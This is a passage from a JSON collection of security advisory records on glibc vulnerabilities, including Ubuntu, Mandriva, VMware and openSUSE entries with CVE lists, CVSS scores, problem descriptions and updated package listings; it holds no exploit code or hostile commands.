http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dev_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 2930342 ab1cbdc690c23526454c89572c1279d4\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-pic_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 1710196 4ccecb4ace328a7f3ff6a61479e7487d\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-prof_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 2391158 55f69253cf619fe9f6442a91defb78de\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparc64_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 4335174 0b6f37263a46f458046cceeeff8ce859\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparc64b_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 1831380 ce74f393f65a70474911e2dc578e0091\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparc64v2_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 1774820 fd5d8e621b06346f56cfa6fbf59e4863\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparc64v_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 1775850 72fe2bb6b4a8df4861d4c492dca78d0b\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparcv9b_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 1651042 e922d45013457f7a71805342e103a63c\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparcv9v2_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 1733822 6241760b65a2edca2be925e74de8c236\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparcv9v_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 1732826 8f46bfef21a98113037e41c197581d73\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-udeb_2.11.1-0ubuntu7.1_sparc.udeb\r\n Size/MD5: 1302836 2cf6cb1ab759727831543cec81e96838\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 4366704 1edd661a84f744b816b17965dfd5f3c4\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libnss-dns-udeb_2.11.1-0ubuntu7.1_sparc.udeb\r\n Size/MD5: 9750 1f3367ffee93829817e9f22732c44c97\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libnss-files-udeb_2.11.1-0ubuntu7.1_sparc.udeb\r\n Size/MD5: 16282 372ebed356c86943ef61aab37f026b12\r\n http://ports.ubuntu.com/pool/universe/e/eglibc/nscd_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 203348 8e0934fa1e7e88d01856e0ca935afe7c\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2010-05-27T00:00:00", "title": "[USN-944-1] GNU C Library vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:34", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-0296", "CVE-2010-0830", "CVE-2008-1391"], "modified": "2010-05-27T00:00:00", "id": "SECURITYVULNS:DOC:23941", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23941", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:45", "references": ["https://vulners.com/securityvulns/securityvulns:doc:27395"], "description": "Privilege escalation via shared libraries, fnmatch&#40;&#41; buffer overflow, DoS conditions, crypt&#40;&#41; blowfish weak ecnryption implementation.", "edition": 1, "reporter": "BUGTRAQ", "published": "2011-12-04T00:00:00", "title": "glibc multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:45", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "glibc", "version": "2.12", "operator": "eq"}], "cvelist": ["CVE-2011-1658", "CVE-2011-2483", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2011-0536", "CVE-2011-1089"], "modified": "2011-12-04T00:00:00", "id": "SECURITYVULNS:VULN:12065", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12065", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:43", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2011:178\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : glibc\r\n Date : November 25, 2011\r\n Affected: 2010.1, Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities was discovered and fixed in glibc:\r\n \r\n Multiple untrusted search path vulnerabilities in elf/dl-object.c in\r\n certain modified versions of the GNU C Library &#40;aka glibc or libc6&#41;,\r\n including glibc-2.5-49.el5_5.6 and glibc-2.12-1.7.el6_0.3 in Red Hat\r\n Enterprise Linux, allow local users to gain privileges via a crafted\r\n dynamic shared object &#40;DSO&#41; in a subdirectory of the current working\r\n directory during execution of a &#40;1&#41; setuid or &#40;2&#41; setgid program that\r\n has in &#40;a&#41; RPATH or &#40;b&#41; RUNPATH. NOTE: this issue exists because\r\n of an incorrect fix for CVE-2010-3847 &#40;CVE-2011-0536&#41;.\r\n \r\n The GNU C Library &#40;aka glibc or libc6&#41; before 2.12.2 and Embedded GLIBC\r\n &#40;EGLIBC&#41; allow context-dependent attackers to execute arbitrary code\r\n or cause a denial of service &#40;memory consumption&#41; via a long UTF8\r\n string that is used in an fnmatch call, aka a stack extension attack,\r\n a related issue to CVE-2010-2898, as originally reported for use of\r\n this library by Google Chrome &#40;CVE-2011-1071&#41;.\r\n \r\n The addmntent function in the GNU C Library &#40;aka glibc or libc6&#41; 2.13\r\n and earlier does not report an error status for failed attempts to\r\n write to the /etc/mtab file, which makes it easier for local users\r\n to trigger corruption of this file, as demonstrated by writes from\r\n a process with a small RLIMIT_FSIZE value, a different vulnerability\r\n than CVE-2010-0296 &#40;CVE-2011-1089&#41;.\r\n \r\n locale/programs/locale.c in locale in the GNU C Library &#40;aka glibc\r\n or libc6&#41; before 2.13 does not quote its output, which might allow\r\n local users to gain privileges via a crafted localization environment\r\n variable, in conjunction with a program that executes a script that\r\n uses the eval function &#40;CVE-2011-1095&#41;.\r\n \r\n Integer overflow in posix/fnmatch.c in the GNU C Library &#40;aka glibc or\r\n libc6&#41; 2.13 and earlier allows context-dependent attackers to cause a\r\n denial of service &#40;application crash&#41; via a long UTF8 string that is\r\n used in an fnmatch call with a crafted pattern argument, a different\r\n vulnerability than CVE-2011-1071 &#40;CVE-2011-1659&#41;.\r\n \r\n crypt_blowfish before 1.1, as used in glibc on certain platforms,\r\n does not properly handle 8-bit characters, which makes it easier\r\n for context-dependent attackers to determine a cleartext password by\r\n leveraging knowledge of a password hash &#40;CVE-2011-2483&#41;.\r\n \r\n The updated packages have been patched to correct these issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0536\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1071\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1089\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1095\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1659\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2483\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2010.1:\r\n 4af7f6efb12c5be3ad435a6d9865be57 2010.1/i586/glibc-2.11.1-8.3mnb2.i586.rpm\r\n 82f97e43fc7ab7ee2fbfc92d9ed844f0 2010.1/i586/glibc-devel-2.11.1-8.3mnb2.i586.rpm\r\n 013f4da3b270a6860e9ae171b456a488 2010.1/i586/glibc-doc-2.11.1-8.3mnb2.i586.rpm\r\n 65da2025a253885a3a3e0699eb407a61 2010.1/i586/glibc-doc-pdf-2.11.1-8.3mnb2.i586.rpm\r\n e5b6f256bad2b8afa7674e2f4d3c80bc 2010.1/i586/glibc-i18ndata-2.11.1-8.3mnb2.i586.rpm\r\n 319ecf5d08bc0e0aab9b0cf3e5cf6a6e 2010.1/i586/glibc-profile-2.11.1-8.3mnb2.i586.rpm\r\n 99c144bfc7581d9f3b885c7a630c89ce 2010.1/i586/glibc-static-devel-2.11.1-8.3mnb2.i586.rpm\r\n 966e023400d62e841942b69bae4d06de 2010.1/i586/glibc-utils-2.11.1-8.3mnb2.i586.rpm\r\n 577f1f88b14add8ea8753b17d730cb8a 2010.1/i586/nscd-2.11.1-8.3mnb2.i586.rpm \r\n 2e1bffb07071cb21ef6363c21588f4b7 2010.1/SRPMS/glibc-2.11.1-8.3mnb2.src.rpm\r\n\r\n Mandriva Linux 2010.1/X86_64:\r\n 05e4da86aea47726b27c00e3f26e3445 2010.1/x86_64/glibc-2.11.1-8.3mnb2.x86_64.rpm\r\n d3689fe0a7ae8e4c0e309b34c82cabfd 2010.1/x86_64/glibc-devel-2.11.1-8.3mnb2.x86_64.rpm\r\n b8be4de2a9c6a8e3effe06234429a227 2010.1/x86_64/glibc-doc-2.11.1-8.3mnb2.x86_64.rpm\r\n 1ac19950a67c4ee965b0ae9d2d6a0396 2010.1/x86_64/glibc-doc-pdf-2.11.1-8.3mnb2.x86_64.rpm\r\n 54031c917cb54a5abc42ebaf30dfe894 2010.1/x86_64/glibc-i18ndata-2.11.1-8.3mnb2.x86_64.rpm\r\n 18c2a1354df2094a7508b1990420ab5b 2010.1/x86_64/glibc-profile-2.11.1-8.3mnb2.x86_64.rpm\r\n f8cef0d317c3ccbb5446672a1cf00ad6 2010.1/x86_64/glibc-static-devel-2.11.1-8.3mnb2.x86_64.rpm\r\n 78b27e0739627abebc7c43fbf82e107b 2010.1/x86_64/glibc-utils-2.11.1-8.3mnb2.x86_64.rpm\r\n e37194682e8ef10c21a8d8483e76b3f4 2010.1/x86_64/nscd-2.11.1-8.3mnb2.x86_64.rpm \r\n 2e1bffb07071cb21ef6363c21588f4b7 2010.1/SRPMS/glibc-2.11.1-8.3mnb2.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n 73cffaaa03648c9eb01ed50b5fdd0cee mes5/i586/glibc-2.8-1.20080520.5.8mnb2.i586.rpm\r\n 5e9ec7d6e3f319b5076dd51506d47032 mes5/i586/glibc-devel-2.8-1.20080520.5.8mnb2.i586.rpm\r\n c80b37f1a750968735f8ce51c920e84e mes5/i586/glibc-doc-2.8-1.20080520.5.8mnb2.i586.rpm\r\n 7de1f541c2bf6e17a4f3007cad517140 mes5/i586/glibc-doc-pdf-2.8-1.20080520.5.8mnb2.i586.rpm\r\n 27a365665846989b629b0cb3fb15acfd mes5/i586/glibc-i18ndata-2.8-1.20080520.5.8mnb2.i586.rpm\r\n 3f2f68a0bc47bace3586919671c7f1b4 mes5/i586/glibc-profile-2.8-1.20080520.5.8mnb2.i586.rpm\r\n 17019cf79cf3864c537e12aefd48a23d mes5/i586/glibc-static-devel-2.8-1.20080520.5.8mnb2.i586.rpm\r\n 7ad8f634ee4e0c5fc0f340dcfebcf0fb mes5/i586/glibc-utils-2.8-1.20080520.5.8mnb2.i586.rpm\r\n 53a5dc175995723322a13a7e3bbd6c41 mes5/i586/nscd-2.8-1.20080520.5.8mnb2.i586.rpm \r\n 6fcd77d9eac9fa71f91dcb1218afd628 mes5/SRPMS/glibc-2.8-1.20080520.5.8mnb2.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n 33f73ece95aa39c59e0370449f13d3af mes5/x86_64/glibc-2.8-1.20080520.5.8mnb2.x86_64.rpm\r\n 626f8e4774270e50c5e9bf2bc7dfa64c mes5/x86_64/glibc-devel-2.8-1.20080520.5.8mnb2.x86_64.rpm\r\n c9d59258ac0fc0463c585405bb46327a mes5/x86_64/glibc-doc-2.8-1.20080520.5.8mnb2.x86_64.rpm\r\n f81b494a1d394c48921c99983288c538 mes5/x86_64/glibc-doc-pdf-2.8-1.20080520.5.8mnb2.x86_64.rpm\r\n 1c972a49ecbfc91d0a156dd743894c14 mes5/x86_64/glibc-i18ndata-2.8-1.20080520.5.8mnb2.x86_64.rpm\r\n 45aa431a8a9920d188698ae64fe5466d mes5/x86_64/glibc-profile-2.8-1.20080520.5.8mnb2.x86_64.rpm\r\n ecf5dca4c8bc49c1e3ebeb2a698b38a3 mes5/x86_64/glibc-static-devel-2.8-1.20080520.5.8mnb2.x86_64.rpm\r\n 8de7d2dfa8ea598aac75faf24f606f13 mes5/x86_64/glibc-utils-2.8-1.20080520.5.8mnb2.x86_64.rpm\r\n 7615c6e96903c8c146d5ae2d2912c6ee mes5/x86_64/nscd-2.8-1.20080520.5.8mnb2.x86_64.rpm \r\n 6fcd77d9eac9fa71f91dcb1218afd628 mes5/SRPMS/glibc-2.8-1.20080520.5.8mnb2.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFOz9t8mqjQ0CJFipgRApgMAKDCqECazAj1XIHHxrkgU20PDJYFkgCgwVPy\r\nTvvKkY3VN0Zc9M0LYEgkNUg=\r\n=P3KM\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2011-12-04T00:00:00", "title": "[ MDVSA-2011:178 ] glibc", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:43", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-2898", "CVE-2010-0296", "CVE-2011-2483", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2010-3847", "CVE-2011-0536", "CVE-2011-1089"], "modified": "2011-12-04T00:00:00", "id": "SECURITYVULNS:DOC:27395", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27395", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "vmware": [{"lastseen": "2018-09-02T02:40:31", "references": [], "affectedPackage": [{"OS": "Windows", "OSVersion": "any", "packageVersion": "4.1 Update 3", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCenter Server", "operator": "lt"}, {"OS": "ESXi", "OSVersion": "any", "packageVersion": "ESXi500-201212101", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "lt"}, {"OS": "ESXi", "OSVersion": "any", "packageVersion": "4.0", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "eq"}, {"OS": "ESXi", "OSVersion": "any", "packageVersion": "4.1", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "eq"}, {"OS": "Windows", "OSVersion": "any", "packageVersion": "5.0 Update 2", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCenter Server", "operator": "lt"}, {"OS": "Linux", "OSVersion": "any", "packageVersion": "5.0 Update 2", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCSA", "operator": "lt"}, {"OS": "ESXi", "OSVersion": "any", "packageVersion": "ESXi510-201304101", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "lt"}, {"OS": "Linux", "OSVersion": "any", "packageVersion": "5.1.0b", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCSA", "operator": "lt"}], "description": "a. vCenter Server Appliance directory traversal \n \n\n\nThe vCenter Server Appliance (vCSA) contains a directory traversal vulnerability that allows an authenticated remote user to retrieve arbitrary files. Exploitation of this issue may expose sensitive information stored on the server. \n \nVMware would like to thank Alexander Minozhenko from ERPScan for reporting this issue to us. \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-6324 to this issue. \n \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.\n", "edition": 3, "reporter": "VMware", "published": "2012-12-20T00:00:00", "title": "VMware security updates for vCSA, vCenter Server, and ESXi", "type": "vmware", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864", "CVE-2011-4609", "CVE-2012-6325", "CVE-2012-3404", "CVE-2012-6326", "CVE-2012-6324", "CVE-2012-3405", "CVE-2010-0830", "CVE-2012-3480", "CVE-2009-5029", "CVE-2012-3406", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2013-04-25T00:00:00", "id": "VMSA-2012-0018", "href": "https://www.vmware.com/security/advisories/VMSA-2012-0018.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T02:40:32", "references": [], "affectedPackage": [{"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX410-201208101-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX410-201208106-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}, {"OS": "Windows", "OSVersion": "any", "packageVersion": "4.1 Update 3", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCenter", "operator": "lt"}, {"OS": "ESXi", "OSVersion": "any", "packageVersion": "ESXi-5.0.0-20121201001", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "lt"}, {"OS": "ESXi", "OSVersion": "any", "packageVersion": "ESXi410-201208101-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "lt"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "4.0", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "eq"}, {"OS": "ESXi", "OSVersion": "any", "packageVersion": "4.0", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "eq"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX410-201208102-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}, {"OS": "Windows", "OSVersion": "any", "packageVersion": "5.0", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "Update Manager", "operator": "eq"}, {"OS": "Windows", "OSVersion": "any", "packageVersion": "4.1 Update 3", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "Update Manager", "operator": "lt"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX400-201209401-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "3.5", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "eq"}, {"OS": "Windows", "OSVersion": "any", "packageVersion": "5.0 Update 2", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCenter", "operator": "lt"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX410-201208104-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}, {"OS": "ESXi", "OSVersion": "any", "packageVersion": "3.5", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "eq"}, {"OS": "any", "OSVersion": "any", "packageVersion": "1.0.x", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCOps", "operator": "eq"}, {"OS": "any", "OSVersion": "any", "packageVersion": "5.0.3", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCOps", "operator": "lt"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX400-201209402-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX410-201208103-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX410-201208107-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}, {"OS": "Windows", "OSVersion": "any", "packageVersion": "2.5", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "VirtualCenter", "operator": "eq"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX400-201209404-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}, {"OS": "Windows", "OSVersion": "any", "packageVersion": "4.0 Update 4a", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "Update Manager", "operator": "lt"}, {"OS": "Windows", "OSVersion": "any", "packageVersion": "4.0 Update 4a", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCenter", "operator": "lt"}, {"OS": "ESX", "OSVersion": "any", "packageVersion": "ESX410-201208105-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESX", "operator": "lt"}], "description": "a. vCenter and ESX update to JRE 1.6.0 Update 31 \nThe Oracle (Sun) JRE is updated to version 1.6.0_31, which addresses multiple security issues. Oracle has documented the CVE identifiers that are addressed by this update in the Oracle Java SE Critical Patch Update Advisory of February 2012. \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n\n", "edition": 3, "reporter": "VMware", "published": "2012-08-30T00:00:00", "title": "VMware vSphere and vCOps updates to third party libraries", "type": "vmware", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864", "CVE-2011-3188", "CVE-2011-4108", "CVE-2011-4609", "CVE-2011-4128", "CVE-2012-0815", "CVE-2011-3597", "CVE-2011-4324", "CVE-2011-4110", "CVE-2011-4576", "CVE-2011-4577", "CVE-2010-4180", "CVE-2010-4410", "CVE-2011-2699", "CVE-2011-4619", "CVE-2010-2761", "CVE-2011-4132", "CVE-2011-0014", "CVE-2010-0830", "CVE-2011-2484", "CVE-2012-1583", "CVE-2012-0061", "CVE-2012-0393", "CVE-2011-3209", "CVE-2012-0050", "CVE-2011-3363", "CVE-2012-0060", "CVE-2011-1833", "CVE-2012-0207", "CVE-2011-1020", "CVE-2012-2110", "CVE-2012-1569", "CVE-2010-4252", "CVE-2012-0841", "CVE-2009-5029", "CVE-2011-4325", "CVE-2012-1573", "CVE-2011-4109", "CVE-2011-1089", "CVE-2009-5064", "CVE-2011-2496"], "modified": "2012-12-20T00:00:00", "id": "VMSA-2012-0013", "href": "https://www.vmware.com/security/advisories/VMSA-2012-0013.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:45:28", "references": ["https://bugzilla.novell.com/735850"], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "x86_64", "packageFilename": "glibc-32bit-2.11.2-3.7.1.x86_64.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "x86_64", "packageFilename": "glibc-obsolete-2.11.3-12.21.1.x86_64.rpm", "packageName": "glibc-obsolete", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "i586", "packageFilename": "glibc-profile-2.11.2-3.7.1.i586.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "x86_64", "packageFilename": "glibc-locale-2.11.3-12.21.1.x86_64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "x86_64", "packageFilename": "nscd-2.11.3-12.21.1.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "x86_64", "packageFilename": "glibc-2.11.3-12.21.1.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "x86_64", "packageFilename": "glibc-i18ndata-2.11.3-12.21.1.x86_64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "i686", "packageFilename": "glibc-devel-2.11.3-12.21.1.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "i586", "packageFilename": "glibc-obsolete-2.11.3-12.21.1.i586.rpm", "packageName": "glibc-obsolete", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "x86_64", "packageFilename": "glibc-locale-2.11.2-3.7.1.x86_64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "x86_64", "packageFilename": "glibc-profile-32bit-2.11.3-12.21.1.x86_64.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "x86_64", "packageFilename": "glibc-locale-32bit-2.11.2-3.7.1.x86_64.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "x86_64", "packageFilename": "glibc-info-2.11.3-12.21.1.x86_64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "x86_64", "packageFilename": "nscd-2.11.2-3.7.1.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "x86_64", "packageFilename": "glibc-info-2.11.2-3.7.1.x86_64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "i586", "packageFilename": "nscd-2.11.3-12.21.1.i586.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "x86_64", "packageFilename": "glibc-html-2.11.2-3.7.1.x86_64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "i586", "packageFilename": "glibc-info-2.11.2-3.7.1.i586.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "i686", "packageFilename": "glibc-devel-2.11.2-3.7.1.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "x86_64", "packageFilename": "glibc-profile-32bit-2.11.2-3.7.1.x86_64.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "i586", "packageFilename": "glibc-html-2.11.2-3.7.1.i586.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "i586", "packageFilename": "glibc-locale-2.11.2-3.7.1.i586.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "x86_64", "packageFilename": "glibc-locale-32bit-2.11.3-12.21.1.x86_64.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "i586", "packageFilename": "glibc-obsolete-2.11.2-3.7.1.i586.rpm", "packageName": "glibc-obsolete", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "i586", "packageFilename": "glibc-html-2.11.3-12.21.1.i586.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.7.1", "arch": "x86_64", "packageFilename": "glibc-i18ndata-2.11.2-3.7.1.x86_64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "2.11.3-12.21.1", "arch": "i586", "packageFilename": 